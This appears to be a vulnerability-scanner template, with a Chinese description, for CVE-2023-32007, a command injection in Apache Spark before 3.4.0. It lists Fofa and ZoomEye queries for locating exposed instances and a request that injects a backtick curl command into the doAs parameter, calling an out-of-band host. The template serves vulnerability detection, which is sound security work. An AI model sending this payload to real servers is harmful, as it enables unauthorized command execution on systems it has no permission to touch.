漏洞描述
Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
Fofa: app="APACHE-Spark-Jobs"
ZoomEye: app:"Apache Spark Jobs"
id: CVE-2023-32007
info:
name: Apache Spark远程代码执行漏洞
author: zan8in
severity: critical
verified: false
description: |-
Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
Fofa: app="APACHE-Spark-Jobs"
ZoomEye: app:"Apache Spark Jobs"
reference:
- https://mp.weixin.qq.com/s/jCvb9e_lPWLS01cjw2wqjw
tags: cve,cve2023,apache,spark,rce
created: 2023/11/21
set:
oob: oob()
oobHTTP: oob.HTTP
rules:
r0:
request:
method: GET
path: /jobs/?doAs=`curl+{{oobHTTP}}`
expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()